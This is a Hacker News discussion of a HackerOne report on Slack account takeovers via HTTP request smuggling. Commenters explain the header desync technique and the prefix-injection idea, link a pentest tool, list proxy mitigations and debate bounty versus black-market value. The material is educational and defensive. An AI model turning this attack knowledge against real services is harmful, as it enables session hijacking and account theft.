[HN Gopher] Slack account takeovers using HTTP Request Smuggling
       ___________________________________________________________________
        
       Slack account takeovers using HTTP Request Smuggling
        
       Author : bartkappenburg
       Score  : 329 points
       Date   : 2020-03-13 15:19 UTC (7 hours ago)
        
 (HTM) web link (hackerone.com)
 (TXT) w3m dump (hackerone.com)
        
       | Bhilai wrote:
       | Original Paper for those interested -
       | https://portswigger.net/research/http-desync-attacks-request...
        
       | gavingmiller wrote:
       | Anyone know if the `smuggler` tool used is available online?
        | Can't find any reference to it on GitHub or elsewhere, and I'm
       | not familiar with it.
       | 
       | Edit: Found it here: https://github.com/gwen001/pentest-
       | tools/blob/master/smuggle...
        
         | dt3ft wrote:
         | Thank you, I was looking for this as well.
        
       | phonebucket wrote:
       | I'm impressed by how competent and professional some independent
       | security researchers are.
       | 
       | How do people learn this stuff? Are there any resources that
       | anyone here can recommend?
        
         | JMTQp8lwXL wrote:
          | In this particular instance, it's a savvy understanding of the
          | HTTP protocol. The 'Content-Length' and 'Transfer-Encoding'
          | headers answer the same question in conflicting ways: the
          | first states exactly how many bytes of body data there are;
          | the second ('chunked') says the body is a series of length-
          | prefixed chunks, terminated by a zero-length chunk.
          | 
          | Different systems resolve the question of "Well, what should I
          | (the system) do when I get both headers?" differently, and
          | once two systems in the same chain disagree, you can break the
          | atomicity of the HTTP request-- which opens up a really
          | interesting (and severe) class of exploits.
         | 
         | I'm not very good at finding vulnerabilities, beyond the
         | obvious sql-injection attack types that we are generally
         | trained to avoid. I imagine, however, getting good at finding
         | these is a skill that can be learned with time. Alternatively,
         | finding vulnerabilities might be more akin to pharmaceutical
          | developments: with 1,000 swings, you're missing at least 950
          | of them, or more. A dash of luck in there.
        
           | tptacek wrote:
           | It probably helps to know that this particular bug was a
           | major announcement at Black Hat last year, by James Kettle,
           | who is a vulnerability research celebrity. So lots of people
           | are looking for this particular bug.
           | 
           | Black Hat talks are eventually published online for free;
           | here's this one:
           | 
           | https://www.youtube.com/watch?v=upEMlJeU_Ik
        
             | JMTQp8lwXL wrote:
             | Given how widely publicized request smuggling was, I'm
             | surprised it's still a problem for apps with large user
             | bases like Slack.
        
               | lonelappde wrote:
               | Other commenters note that some platforms intentionally
               | leave this vuln open because closing it breaks some buggy
               | clients. Convenience over security.
        
       | wpietri wrote:
       | I was unfamiliar with request smuggling; here's an explainer:
       | https://portswigger.net/web-security/request-smuggling
       | 
       | The first in-band signalling attack I came across was the blue
       | box [1], invented in the late 1960s. It still occasionally worked
       | in the 1980s on older phone systems. It amazes me that we're
       | still creating new systems vulnerable to in-band attacks.
       | 
       | [1] https://en.wikipedia.org/wiki/Blue_box
        
         | abhishekjha wrote:
          | Is this what Steve Jobs and his friend used to hijack
          | telephone lines and call the Pope, free of charge?
        
           | acruns wrote:
           | Yes. https://www.inc.com/glenn-leibowitz/in-a-rare-23-year-
           | old-in...
        
           | AnIdiotOnTheNet wrote:
           | Of all the places on the internet to hear Steve Wozniak
           | referred to simply as Steve Jobs's friend...
        
             | abhishekjha wrote:
              | Sorry, I didn't realise that the other friend in this
              | incident was Steve Wozniak specifically. I saw his
              | interview after his return to Apple.
        
         | lonelappde wrote:
         | How can you avoid in-band attacks? I'm not going to send a
         | postcard to a webserver with metadata about every HTTP request.
        
           | wpietri wrote:
           | The phone system switched call routing from in-band
           | signalling (that is, tones you could hear on the wire) to
            | out-of-band signalling (where control information went over
            | channels separate from the content).
           | 
           | Another approach is reliable encapsulation. Ethernet and
           | TCP/IP, for example, are technically all in one channel. But
           | packet content won't be mistaken for protocol information.
           | You could also look at things like SSH and how it has
           | multiple channels: https://tools.ietf.org/html/rfc4254
           | 
           | I'm sure there are other approaches, too, and I hope people
           | will mention them.
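The encapsulation point above can be shown with a toy length-prefixed framing scheme (a sketch, not any real protocol): because the receiver learns each message's length from a fixed header before touching the payload, payload bytes that happen to look like framing are never interpreted as framing.

```python
import struct

# Toy "reliable encapsulation": a 4-byte big-endian length header
# precedes each payload. The frame/unframe names are invented for
# this illustration.

def frame(payload: bytes) -> bytes:
    # Length header first, then the payload verbatim.
    return struct.pack(">I", len(payload)) + payload

def unframe(stream: bytes) -> list:
    """Split a byte stream back into its framed messages."""
    messages, offset = [], 0
    while offset < len(stream):
        (length,) = struct.unpack_from(">I", stream, offset)
        offset += 4
        messages.append(stream[offset:offset + length])
        offset += length
    return messages

# This payload starts with bytes that resemble a length header, but the
# receiver never misparses it -- the real header already said how many
# bytes belong to the message.
tricky = struct.pack(">I", 9999) + b"not a real frame"
stream = frame(b"hello") + frame(tricky)
assert unframe(stream) == [b"hello", tricky]
```

Request smuggling is what happens when that guarantee is missing: two parsers each decide for themselves where one message ends and the next begins.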
        
         | JangoSteve wrote:
         | Can someone explain the redirect/cookie-stealing part of this?
         | I read through the post explaining request smuggling, and then
         | re-read their exploit description, and the request smuggling
         | part all makes sense. However, I don't fully understand the
         | significance of the 301 in relation to the browser sending the
         | attacker's server the cookie with the request.
         | 
         | If the back-end server is already proxying whatever request it
         | receives from the front-end proxy server, why was it necessary
         | to first get it to redirect an HTTP 1.1 header to an https
         | request? The only thing I could think of was that maybe it has
         | something to do with getting the unencrypted cookie, but
         | according to their description, the forwarded request with the
         | cookie doesn't happen until after the redirect to https anyway.
         | 
         | I know I'm missing something obvious here.
        
           | terom wrote:
           | The collab_2.png screenshot shows `User-Agent: ...
           | Slack/4.1.2 ... Electron/6.0.10 ...`, so it's their own
           | desktop app doing the https://slackb.com/... HTTP 301 ->
           | https://*.burpcollaborator.com request. Perhaps their client
            | implements its own quirky redirect-following, which keeps
            | the original `Cookie: ...` headers in the redirected request?
           | 
           | I find it hard to believe that any browser would keep the
           | original `Cookie: ...` headers in a redirected request to a
           | different origin.
        
             | londons_explore wrote:
             | Some proxies follow redirects... It enables devs to do
             | things like "redirect request to the old server", and the
             | client never needs to know (which is important for
             | maintaining compatibility with an old api)
             | 
             | In that case, I'd expect all cookies etc. to be forwarded.
        
             | JangoSteve wrote:
             | Interesting! That's definitely something I missed, thank
             | you.
             | 
             | I still wouldn't expect an Electron app to subvert basic
             | browser sandboxing by default, particularly where they
             | wouldn't have expected to need to redirect users to other
             | domains with cookies intact. It seems like they'd need to
             | go out of their way to enable that.
             | 
             | I wonder if it has to do with the sign-in tokens they send
             | or otherwise allowing the user to move between the browser
             | and the app within their account. For example, when you're
             | in the app and click "Manage Users" and it sends you to a
             | management dashboard in the browser. or when you click a
             | link with an auth token in the browser and it launches you
             | into the app.
        
           | tptacek wrote:
           | What's subtle is that the middlebox is being tricked into
           | parsing the body of an HTTP request as the envelope, or vice
           | versa. The requests hitting the backend are being scrambled.
           | The browser is doing what it can to ensure cookies only go to
           | the right domain, but the servers are chopping those careful
           | requests up and sending them to random places.
        
             | bawolff wrote:
              | Are you saying it's Slack's front-end server that is
              | processing the 301, and not the user's web browser? And
              | that Slack's front-end server is configured such that
              | when it gets a 301 it just resends the entire request
              | (including all headers) to the redirect destination?
             | 
             | Edit: this seems likely to not be what he was saying and
             | also not the case.
        
             | jorams wrote:
             | > the servers are chopping those careful requests up and
             | sending them to random places.
             | 
             | I understand that the backend is parsing different requests
             | than the frontend, but I don't see how the cookies ever get
             | sent to the attacker's domain.
             | 
              | I understand three requests as moving like this:
              | 
              |   1. attacker -> frontend -> backend (partially) -> frontend -> attacker
              |   2. victim -> frontend -> backend (including a bit of 1) -> frontend -> victim
              |   3. (after 301) victim -> malicious server
             | 
             | The second request results in a 301, causing the victim's
             | client to make a new request to the target of the 301. This
             | new request does not include cookies, because it is to a
             | different domain.
             | 
             | What am I misunderstanding? When do the cookies get sent to
             | the malicious server?
        
               | tptacek wrote:
               | Alongside a legitimate request with cookies, there is
               | queued an evil request that uses mismatched Content-
               | Length and chunked encoding headers to graft the body of
               | the evil request to the envelope of the legitimate
               | request. The evil body becomes the envelope for the
               | entire legitimate request, and the evil envelope
               | generates the redirect.
               | 
               | Skip down to the "Explanation of malicious request"
               | section.
        
               | JangoSteve wrote:
               | All of your explanation (which is appreciated) just
                | further describes the request smuggling, not how that
                | ends up sending the Slack cookies to the hacker's server.
               | 
               | If you take all of this together, it's all leading to
               | Slack's back-end server returning to the user's client a
               | 301 response that tells the user's browser to send a new
               | request to the hacker's domain. However, when the browser
               | does this, it's to a different domain, so typically the
               | slack cookies would not get sent with that request,
               | unless I'm missing something.
               | 
               | The "Explanation of malicious request" section doesn't
               | explain this, either. All it explains is that all this
               | effort was to get Slack's server to send a 301 response
               | to the user's browser pointing to the hacker's server,
               | but then it glosses over any information about how the
               | cookies are getting sent with a single sentence, "and all
               | cookies (including 'd') get redirected there too.... :("
               | 
               | My question is, how?
               | 
               | Is something going on where Slack's back-end servers are
               | explicitly setting response headers that allow their
               | cookies to be sent to the hacker's domain? Is there some
               | additional vulnerability that's allowing the browser to
               | send the cookie across domains on a 301 redirect?
        
               | justicz wrote:
               | If you zoom in on the last image in the report, you see
               | that the victim's client is not a web browser, but
               | Slack's Electron-based client. Perhaps that client is
               | willing to send Slack cookies cross-domain after a
               | redirect for an auth'd request?
               | 
               | Edit: looks like terom above me had the same idea before
               | I did
        
               | jorams wrote:
               | I get that the evil body essentially gets prefixed to the
               | legitimate request, making the server generate the
               | redirect, but this redirect is returned to the victim.
               | The victim then makes a request to the malicious server,
               | and this request should not contain cookies because the
               | origin is different. How do the cookies get to the
               | attacker?
        
           | kbenson wrote:
           | The hackerone write up which this submission points to
           | actually goes into explicit detail on what happens step by
           | step, along with nice infographics.
           | 
            | The TL;DR is that you can make the front-end see something
            | like GET /my/supplied/url\nX:X at the end of your request,
            | but the back-end sees it as the beginning of the next
            | request (and the X:X turns the real GET/POST request line
            | into a custom header of X:XGET /real/request/url), and
            | Slack returns that request with cookies for that person,
            | but to a domain controlled by you when it comes back. The
            | diagrams included in the post and the accompanying text do
            | a better job of explaining it than I am, I think.
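That grafting step can be sketched at the byte level. Hostnames, paths, and the cookie value below are made up; the snippet just concatenates bytes the way the poisoned back-end connection would see them.

```python
# How a smuggled prefix mangles the victim's request on the reused
# back-end connection (all names here are illustrative).

smuggled_prefix = (
    b"GET https://evil.example/ HTTP/1.1\r\n"
    b"X: X"  # deliberately no CRLF: it will absorb the next request line
)

victim_request = (
    b"GET /api/messages HTTP/1.1\r\n"
    b"Host: slack.example\r\n"
    b"Cookie: d=secret-session-cookie\r\n"
    b"\r\n"
)

# The victim's real request line is swallowed into the harmless "X"
# header, and the attacker-supplied URL becomes the request that gets
# answered -- while the victim's own headers (cookie included) ride
# along underneath it.
merged = smuggled_prefix + victim_request
assert merged.split(b"\r\n")[0] == b"GET https://evil.example/ HTTP/1.1"
assert merged.split(b"\r\n")[1] == b"X: XGET /api/messages HTTP/1.1"
```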
        
             | bawolff wrote:
             | I'm also similarly confused. The post explains request
             | smuggling really well, but doesn't really explain how that
             | equals getting the victim's cookies.
             | 
             | This is my understanding of the bug:
             | 
             | * Attacker sends malformed request to slack servers.
             | Request gets split in two. First part results in something
             | sent back to attacker, next part of request is treated as a
             | prefix to the next legit (victim's) http request made
             | 
             | * Slack backend server responds to victim's request
             | treating it as having part of the attacker's request
             | prefixed. The merged request results in a 301 http redirect
             | response, redirecting the victim to an attacker controlled
             | domain.
             | 
             | * Victim's browser gets the 301, and follows the redirect.
              | When following the redirect, _the cookie header is somehow
              | sent to the attacker's site_ <-- the part I don't
              | understand here
             | 
             | I don't understand why the victim's browser would send the
             | cookie header when following a redirect to a different
             | domain. I don't understand how causing the victim to follow
             | a cross-domain redirect would allow the attacker to extract
             | the victim's cookie.
        
               | JangoSteve wrote:
               | Yes, this was precisely my question. I agree with you
               | that the post does a great job of explaining the how
               | request smuggling works, and how they used it to trick
               | Slack's server into responding to the user's client with
               | a 301 redirect to the hacker's server. But then, when
               | they got to the part where the cookies are sent, they
               | just said, "and the cookies are sent" with no further
               | explanation.
               | 
               | That's the part I'm stuck on. Is there some browser
               | behavior I'm not remembering where it sends sensitive
               | cookies across domains just because one redirected the
               | browser to the other?
        
               | Matt3o12_ wrote:
                | I think this rather applies to API clients, which can
                | handle that differently. A quick test with Python's
                | requests shows that all headers are forwarded on
                | redirect regardless:
                | 
                |   requests.request(
                |       "GET",
                |       "http://localhost/redirect-to?url=http%3A%2F%2Fhttpbin.org%2Fget",
                |       headers={"x-foo": "bar", "Cookies": "abc=dcv;"},
                |   ).json()
                | 
                |   {
                |     "args": {},
                |     "headers": {
                |       "Accept": "*/*",
                |       "Accept-Encoding": "gzip, deflate",
                |       "Cookies": "abc=dcv;",
                |       "Host": "httpbin.org",
                |       "User-Agent": "python-requests/2.22.0",
                |       "X-Amzn-Trace-Id": "Root=1-5e6bebe1-cd6e71729a818015a06aa7cb",
                |       "X-Foo": "bar"
                |     },
                |     "origin": "91.58.8.128",
                |     "url": "http://httpbin.org/get"
                |   }
               | 
                | I'm running a local copy of httpbin on localhost, so
                | Python's requests should not send sensitive headers
                | across that cross-domain redirect, but it does. Golang
                | is a bit more explicit about its HTTP client behavior:
               | 
               | > * when forwarding sensitive headers like
               | "Authorization", "WWW-Authenticate", and "Cookie" to
               | untrusted targets. These headers will be ignored when
               | following a redirect to a domain that is not a subdomain
               | match or exact match of the initial domain. For example,
               | a redirect from "foo.com" to either "foo.com" or
               | "sub.foo.com" will forward the sensitive headers, but a
               | redirect to "bar.com" will not.
               | 
               | https://golang.org/pkg/net/http/#Client
               | 
               | Though this might also cause problems if you are using
                | sensitive non-standard headers such as X-Token for token
               | authentication, etc.
               | 
               | So while you could probably mitigate this vulnerability
               | on some clients, you are trusting the server to only
               | redirect you to trusted URLs which is not the case here.
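The Go rule quoted above is simple to restate in code. The helper below is hypothetical (not a real API in any library): forward sensitive headers only when the redirect target is the same domain or one of its subdomains.

```python
# A sketch of the redirect policy Go's net/http documents for
# sensitive headers. should_forward_sensitive is an invented name.

def should_forward_sensitive(initial_host: str, redirect_host: str) -> bool:
    # Exact match, or a subdomain of the initial domain.
    return (redirect_host == initial_host
            or redirect_host.endswith("." + initial_host))

# The examples from the Go documentation:
assert should_forward_sensitive("foo.com", "foo.com")
assert should_forward_sensitive("foo.com", "sub.foo.com")
assert not should_forward_sensitive("foo.com", "bar.com")
# A lookalike domain is (correctly) not a subdomain match:
assert not should_forward_sensitive("foo.com", "evilfoo.com")
```

Note this check only protects the client; as the parent comment says, a client that lacks it is trusting the server never to redirect it somewhere hostile.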
        
               | bawolff wrote:
                | Hmm, that would make sense. The user-agent header does
                | have "slack" in it, so probably not a web browser, and
                | it's not far-fetched that most libraries don't implement
                | the same-origin policy when it comes to headers and
                | redirects.
        
         | sixstringtheory wrote:
         | Wow, I was fascinated by phreaking when I was younger and first
         | getting into programming. Been working on mac/iOS for years and
         | never knew that the guys responsible for the most enjoyable
         | part of my career, the Steves, built and sold a blue box!
        
           | at-fates-hands wrote:
           | Of all the stories I heard, Woz was way more interested in
            | using them. When Jobs found out it was illegal, he dropped
           | selling them and distanced himself from the other phreakers
           | he was hanging out with, too afraid of the legal
           | ramifications of getting caught with this equipment.
           | 
           | Most of the books I've read basically paint Jobs as a goody-
           | two-shoes type who cringed at the illegality of phreaking -
           | while saying he probably was thinking ahead, knowing he
           | already wanted to start his own company and didn't want stuff
           | like this to come back and haunt him.
           | 
           | It was an interesting dichotomy to me.
        
       | lala26in wrote:
        | I read it and didn't understand; now I'm questioning my
        | software engineering career choices.
        
       | anonfunction wrote:
       | > Re: disclosure - a redacted disclosure will be fine, but we'll
       | need to hold off for a little bit while we perform our
       | investigation. We'll keep you updated in the meantime, and once
       | we've concluded there wasn't a customer impact we can disclose
       | this. Thanks for your patience!
       | 
       | Does this mean they wouldn't want to disclose it if the same
       | exploit was used against users by another hacker?
        
         | jessaustin wrote:
         | Maybe they could have had similar vulnerabilities in other
         | parts of their stack?
        
         | jaywalk wrote:
         | No, it means they'd want affected customers to hear it from
         | them first.
        
       | fiberoptick wrote:
       | Wow, an ATO exploit that only received a $6,500 bounty? This
       | signals to grey-/black-hat researchers that their research
        | efforts or Slack bug disclosures are best directed elsewhere.
        
         | xyst wrote:
         | Probably took weeks to build his own suite of automated tests
         | for these types of exploits. All he has to do at this point is
         | reconfigure the scripts to point to a new site/app with a
         | bounty program, post report, and reap the benefits.
         | 
          | Assuming he has done this for several other companies, I would
          | say he has effectively earned more than what he put in.
        
         | NikolaeVarius wrote:
         | The literal hacker themselves indicated it was a fair payout.
         | 
         | I don't understand unsolicited complaining for other people.
        
           | kjaftaedi wrote:
           | They're not 'complaining' about the amount in the way that
           | you're thinking.
           | 
           | They're suggesting that the severity of such a bug warrants a
           | larger payout, because not doing so creates possible
           | incentives for future explorers to consider selling these
           | sorts of things on the black market.
           | 
            | This person may be satisfied; the next person who finds
            | something similar may think twice.
        
           | whiskeykilo wrote:
           | It's a free market. Don't like the payout? Don't submit the
            | bug. Someone else probably will anyway.
        
           | [deleted]
        
           | pathseeker wrote:
           | >I don't understand unsolicited complaining for other people.
           | 
           | If you observe someone getting paid a much lower-than-market
           | amount for something you can complain that the company is
           | being cheap and likely driving away a lot of potential
           | sellers (security researchers in this case) regardless of how
           | happy the one person is.
        
             | tptacek wrote:
             | This is not a below-market rate.
        
               | fiberoptick wrote:
               | I noticed that throughout this thread you have been
               | making this assertion. Could you share any data or
               | citations to support this?
               | 
               | Would you feel any differently about the value of this
               | bug if it affected, e.g. Google or Facebook?
        
               | tptacek wrote:
               | No, I would not feel differently about it. The same
               | dynamic would apply.
               | 
               | People on HN seem generally to believe that for any
               | malicious activity you could do with a bug, there's a
               | bidding group of willing buyers somewhere on some darknet
               | site. That's not the case. Random bugs like this may get
               | passed around, but the bugs that command a price all fit
               | a couple specific molds: they're things you can drop into
               | someone's existing operational process.
               | 
               | A Firefox drive-by RCE has some value: many organizations
               | are set up to actively exploit Firefox browsers. So does
               | an iOS jailbreak: lots of people stockpile iOS
               | jailbreaks, for malware implants and for other purposes.
               | 
               | An important common thread among the bugs with liquid
               | markets is that they have a meaningful half-life: once
               | they're burned, it still takes time to eradicate the
               | vulnerable installations. Serverside bugs are fixed
               | worldwide instantaneously. You can see this dynamic in
               | how grey-market payments are tranched.
        
               | pathseeker wrote:
               | This ignores the black market. This exploit would have
               | been extremely valuable to insider trading rings.
        
           | empath75 wrote:
           | I do wonder what the FSB would have paid for it tho.
        
         | edoceo wrote:
         | How much should they have been paid? This seems like a week of
         | pay for a pretty good software dev. That's not fair comp?
        
           | vlovich123 wrote:
           | The value is not about the time spent finding the bug. It's
           | about the severity of the issue, the scale, & the competitive
           | cost of me selling it on the black market. If Apple left open
           | a 0-day rootkit exploit that took me somehow 1 day to find
           | it's still worth hundreds of thousands of dollars.
        
             | vasco wrote:
             | Well yeah if your comparison is that the person's morals
             | allow them to just turn around and sell it in the black
             | market, maybe they could've paid more. But the reality of
             | HackerOne is that most people are really just doing it as a
             | hobby or side project that happens to generate cash.
             | 
             | Some people build 10 different static website generators,
             | others do bug bounties. It doesn't mean they'd go on to
             | sell these exploits and risk going to jail.
        
               | QuinnWilton wrote:
               | It's not the people using HackerOne to be concerned
               | about. It's the ones who don't use HackerOne because they
               | realize they'd get more money on the black market.
               | 
               | When it comes to vulnerabilities with a large enough
               | impact it isn't enough to learn about most of them,
               | because all it takes is one financially motivated actor
               | to weaponize things.
        
               | tptacek wrote:
               | There is almost certainly no liquid black market for this
               | bug, even though Slack is very important to lots of
               | businesses. It had no half-life at all (the fix was one-
               | and-done) and doesn't fit into any existing
               | business/operational model (nobody has an infrastructure
               | where different targeted Slack bugs are pin-compatible
               | drop-ins).
        
             | floatrock wrote:
             | This thread is interesting because it shows different ways
             | people value their work.
             | 
             | This is reasonable if you look at it as "just another job"
             | -- you're being paid to build Good Software, so just
             | another day at work. Or you're doing a Good Thing by
             | helping a lot of people not get pwned.
             | 
              | This is unreasonable if you look at it as value-creation:
             | "how much is this worth on the black market" or "what is
             | this worth to Slack as a company".
             | 
             | Other people can get into the socioeconomic or means-of-
             | production or entrepreneuring implications of all this, but
             | I just think whether you downvoted or upvoted this provides
             | a useful mirror into how one values one's own professional
             | work.
        
               | londons_explore wrote:
               | And then there are the people who want to be paid
               | whichever is the higher of the two approaches.
        
             | CameronNemo wrote:
             | This assumes the researcher is indifferent to white/black
             | hatting. In all likelihood, the researcher may have some
             | personal preference to be a white or black hat, and it
             | could depend on the ethics of the company in question.
             | 
             | There is also the cost of the likelihood of being caught
             | while selling vulnerabilities on the black markets. If
             | fascists have some personal stake in the company, black
             | hatting would likely involve more careful and high stakes
             | anonymity measures. Remember that US federal law
             | enforcement agencies operate tor exit nodes!
        
             | SamuelAdams wrote:
             | I'm genuinely curious about this. If you ask for black-
             | market rate compensations for disclosing a vulnerability,
             | how is that not extortion? "Pay me this sum or I / someone
             | will use this against you." seems to be what you are
             | suggesting.
        
               | vlovich123 wrote:
               | I think you're looking at this from not quite the
               | perspective I'm taking. I'm not saying that any
               | individual is going to go "Pay me this or I will attack
               | you. No that's not enough. I want $X". That is extortion
               | of course.
               | 
               | I'm looking at it from the perspective of the market
               | economics. Reward programs are about incentivizing people
               | to do responsible disclosure. If the market (i.e. the
               | black market here) pays significantly higher for an
               | exploit then a reasonable company will try to reflect
               | their payout to match what the "market" has valued that
               | exploit to be worth. This way someone who would
               | _otherwise_ have sold on the black market may be
               | incentivized to do responsible disclosure instead
               | (significant payout, maybe not as high but 100% legal  &
               | no legal risk). It's all about shifting the incentives
               | and structure before people even make any decision. I
                | think it's silly that companies get dinged when their
                | responsible disclosure programs don't pay out at the same
                | rate as the black market; there's a legal-risk element
                | that's not being factored into the math. But it should be
               | roughly comparable (my uneducated gut check is within
               | ~20%).
               | 
               | Think of it like drugs. Marijuana on the black market is
               | cheaper. People still opt to buy legal marijuana even
               | though it's slightly more expensive because it's safer,
               | legal, & vendors are accountable to their customers &
               | community. If the cost grows too large then the black
               | market starts to grow again (e.g. cigarettes are a
               | notorious example of this due to taxation as an attempted
               | lever to kill it).
        
               | tptacek wrote:
               | The black market does not outbid bounties for this kind
               | of bug.
        
               | [deleted]
        
               | vlovich123 wrote:
               | Good to know. Is there some resource you use to track
               | this kind of stuff?
        
               | tptacek wrote:
               | Nothing super authoritative; mostly from talking to
               | people who've done it. But: there's Maor Schwartz's
               | excellent Black Hat talk from last year:
               | 
               | https://i.blackhat.com/USA-19/Wednesday/us-19-Shwartz-
               | Sellin...
               | 
               | And you can always look at things like the Zerodium Price
               | List. I don't know that it's taken very seriously in its
               | particulars, but the general structure of it mirrors what
               | I've heard from other sources.
               | 
               | You'll notice on the Zerodium list that they will pay for
               | serverside RCE in web apps --- but only a particular kind
               | of web app: the kind that is deployed in lots of places.
               | National IC agencies will, for instance, pay for phpBB
               | RCE, because they have targets that use phpBB, and there
               | are lots of phpBB's (when you hear people talking about
               | how valuable a web bug is, ask yourself whether that
               | person has mentioned the weird market for phpBB bugs ---
               | something I've had firsthand [refused!] experience with).
               | What you won't see are bugs in SAAS applications. Again,
               | the reason is that a phpBB vulnerability has a half-life:
               | everyone has to install the patch once it's burned.
               | 
               | I have no evidence for what I'm about to say here, so
               | take it with a grain of salt:
               | 
                | I assume you _can_ get paid for a vulnerability even as
                | esoteric as this Slack ATO bug. But you'll get paid by
                | people who are buying Slack accounts, not Slack _bugs_.
                | That is: you'll have to be the one exploiting it, and
                | you'll be making one-off deals to use it to get targeted
               | accounts. People sell all kinds of accounts; it would not
               | surprise me even a little to hear that there was a market
               | for company Slack accounts.
               | 
               | But to participate in that market, you'd almost certainly
               | have to directly enter a criminal conspiracy. You
               | wouldn't be selling a bug to a market; you'd be
               | participating.
        
           | lonelappde wrote:
           | If he worked a week and didn't find a vuln, he'd get 0.
           | Average that in.
           | 
           | Bug bounties are the uberification of security research.
        
           | penagwin wrote:
           | > This seems like a week of pay for a pretty good software
           | dev.
           | 
           | Wait, 6500 * 4 * 12 = 312,000/yr
           | 
           | Might be a bit high for a week :P
           | 
            | EDIT: Okay, turns out that if you live in the Bay Area this
            | isn't unheard of - the rest of us make 4x to 5x less than
            | that (saying this as a mid-level software dev from West
            | Michigan).
        
             | sciurus wrote:
             | That matches up with the mid to senior range you'll see for
             | FAANG at https://www.levels.fyi/
        
             | bluedino wrote:
             | 60-75k is on the low side for a qualified dev, even in
             | Michigan.
        
             | randlet wrote:
             | Salary information on HN is skewed by Bay area engineers
             | where $312k is not out of the realm of possibility for a
             | senior developer afaik.
        
             | moneromoney wrote:
              | In Germany you will be VERY lucky making 100,000 euro /
              | year. Germany has the lowest software dev. salary /
              | average country salary ratio of all countries on the
              | planet.
        
               | foepys wrote:
               | Unless you are doing anything more or less related to
               | SAP. Then you can make $150k/a easily.
               | 
               | If only other companies would realize that that's one of
               | the reasons why SAP is Germany's no. 1 software company.
        
           | tptacek wrote:
           | It is, as the bounty reporter says themselves, eminently
           | fair. People on this site have very weird ideas of what the
           | going rates for bounties are.
        
             | sarakayakomzin wrote:
             | The bounty hunter isn't a source of truth for the value of
             | the bug. If you don't think you could sell an exploit to
              | take over any Slack account for more than $6500 then you
             | aren't familiar with what the market values in the first
             | place.
        
       | arkadiyt wrote:
       | Protecting against request smuggling:
       | 
       | - If you don't have a proxy fronting traffic, no action required
       | 
       | - If you're behind Fastly/Cloudflare [1] or Akamai [2], no action
       | required / they protect against this attack
       | 
       | - If you're behind AWS Cloudfront, no action required / they
       | protect against this attack
       | 
       | - If you're behind AWS ALB, you're vulnerable by default but can
       | opt-in to protection by enabling the
       | "routing.http.drop_invalid_header_fields.enabled" attribute [3].
       | They initially had it on by default but it broke customers
       | 
       | - If you have a different proxy (e.g. some other provider or your
       | own nginx, haproxy before 2.0.6 [2], etc), you might be
       | vulnerable
       | 
       | [1]: https://portswigger.net/research/http-desync-attacks-
       | request...
       | 
       | [2]: https://portswigger.net/research/http-desync-attacks-what-
       | ha...
       | 
       | [3]:
       | https://docs.aws.amazon.com/elasticloadbalancing/latest/APIR...
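For the ALB case, the opt-in arkadiyt describes in [3] can be done with the AWS CLI. A hedged sketch; the ARN below is a placeholder you would replace with your own load balancer's ARN:

```shell
# Opt in to dropping requests with invalid/ambiguous headers on an
# existing ALB (attribute from [3]; ARN is a placeholder).
aws elbv2 modify-load-balancer-attributes \
  --load-balancer-arn arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/my-alb/50dc6c495c0c9188 \
  --attributes Key=routing.http.drop_invalid_header_fields.enabled,Value=true
```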
        
         | [deleted]
        
         | judge2020 wrote:
         | Regarding Cloudflare/fastly, you do need to make sure you're
         | only allowing requests that originate from the proxy, either
         | via IP-based firewall rules or something like CF's
         | authenticated origin pulls [0]. Otherwise someone could find
         | your origin server's IP and potentially perform this attack
         | (and generally bypass your security settings).
         | 
         | 0: https://support.cloudflare.com/hc/en-
         | us/articles/204899617-A...
        
           | tialaramex wrote:
            | Allowing connections to your backend directly _might_ make
            | you vulnerable to certain types of attack but it doesn't
            | impact Request Smuggling.
           | 
           | The trick in Request Smuggling is that you're trusting an
           | intermediary (in this case a frontend reverse proxy) to
           | mingle everybody's requests into a single pile for you to
           | process and they don't agree with you about how to do this.
           | Chuck thus gets to submit a request which is mingled with
           | Alice's and you end up letting Chuck modify Alice's request.
           | Oops.
           | 
           | But Chuck sending requests directly to your backend doesn't
           | allow him to do this. You're definitely not going to think
           | Chuck's weird garbled nonsense is part of Alice's request
           | when it isn't even on the same TLS connection.
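The framing disagreement tialaramex describes can be made concrete with a small sketch. The payload below is a generic CL.TE example, not the actual Slack exploit: the same byte stream is split differently depending on whether a parser honors Content-Length or Transfer-Encoding: chunked.

```python
# Sketch of the classic CL.TE ambiguity: one byte stream, two ways to
# find the request boundary, depending on which framing header wins.

body = (b"0\r\n\r\n"                    # zero-length chunk: chunked body ends here
        b"GET /smuggled HTTP/1.1\r\n"   # ...but these bytes are still inside
        b"Host: example.com\r\n\r\n")   # the Content-Length-framed body

stream = (b"POST / HTTP/1.1\r\n"
          b"Host: example.com\r\n"
          b"Content-Length: " + str(len(body)).encode() + b"\r\n"
          b"Transfer-Encoding: chunked\r\n"
          b"\r\n" + body)

def split_by_content_length(data):
    """Frame the first request the way a Content-Length parser would."""
    head, _, rest = data.partition(b"\r\n\r\n")
    n = next(int(line.split(b":")[1])
             for line in head.split(b"\r\n")
             if line.lower().startswith(b"content-length"))
    return rest[:n], rest[n:]           # (body, leftover bytes)

def split_by_chunked(data):
    """Frame the first request the way a chunked parser would."""
    _, _, rest = data.partition(b"\r\n\r\n")
    end = rest.index(b"0\r\n\r\n") + 5  # body ends at the zero-length chunk
    return rest[:end], rest[end:]

cl_body, cl_leftover = split_by_content_length(stream)
te_body, te_leftover = split_by_chunked(stream)
# The Content-Length view consumes everything; the chunked view leaves a
# "GET /smuggled ..." prefix waiting to be glued onto the next request
# on the same connection -- which may belong to another user.
```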
        
           | ckuehl wrote:
           | Also keep in mind that if you use IP-based whitelisting, an
           | attacker can register their own CF/Fastly account and target
           | your origin server with whatever CDN settings they want
           | (assuming they can discover your origin server). With Fastly
           | at least you can even do this from the free tier.
        
             | jaywalk wrote:
             | Took me a second to wrap my head around what you were
             | saying, so I'll point it out: they'd be pointing their CDN
             | account to your origin server, and making requests through
             | it.
        
               | judge2020 wrote:
               | Same for Cloudflare - to mitigate this your server should
                | only respond to the correct Host header for your website.
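One way to implement judge2020's suggestion in nginx (a sketch; the server name and certificate paths are placeholders) is a catch-all virtual host that closes the connection for any unexpected Host:

```nginx
# Catch-all: 444 is nginx's "close the connection without a response".
server {
    listen 443 ssl default_server;
    server_name _;
    ssl_certificate     /path/to/fallback.pem;   # placeholder paths
    ssl_certificate_key /path/to/fallback.key;
    return 444;
}

server {
    listen 443 ssl;
    server_name example.com;   # only the expected Host reaches the app
    # ... real site configuration ...
}
```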
        
         | jackewiehose wrote:
         | > If you have a different proxy (e.g. some other provider or
